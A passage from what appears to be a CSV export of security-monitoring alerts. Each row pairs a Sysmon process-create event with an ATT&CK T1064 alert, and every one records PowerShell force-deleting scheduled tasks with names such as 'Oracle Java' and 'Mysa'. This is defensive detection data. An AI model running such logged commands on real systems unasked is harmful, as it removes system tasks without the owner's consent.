/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.299848700Z"",""eventRecordID"":""2209"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.287\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001005bb1900}\r\nProcessId: 1548\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.287"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001005bb1900}"",""processId"":""1548"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.884",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.249 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001075b91900} +ProcessId: 664 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.251984400Z"",""eventRecordID"":""2208"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.249\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001075b91900}\r\nProcessId: 664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN 
ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.249"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001075b91900}"",""processId"":""664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:18:04.868",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.223 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e5b71900} +ProcessId: 6880 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.226192100Z"",""eventRecordID"":""2207"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.223\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e5b71900}\r\nProcessId: 6880\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.223"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010e5b71900}"",""processId"":""6880"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.852",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.201 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001056b61900} +ProcessId: 3828 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.203083700Z"",""eventRecordID"":""2206"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.201\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001056b61900}\r\nProcessId: 3828\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.201"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001056b61900}"",""processId"":""3828"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.838",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.177 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c6b41900} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.179940400Z"",""eventRecordID"":""2205"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.177\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c6b41900}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:36.177"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010c6b41900}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.821",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.151 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001037b31900} +ProcessId: 1552 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.154408200Z"",""eventRecordID"":""2204"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.151\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001037b31900}\r\nProcessId: 1552\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.151"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001037b31900}"",""processId"":""1552"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.806",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.105 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001071b11900} +ProcessId: 3308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.111970200Z"",""eventRecordID"":""2203"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.105\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001071b11900}\r\nProcessId: 3308\r\nImage: 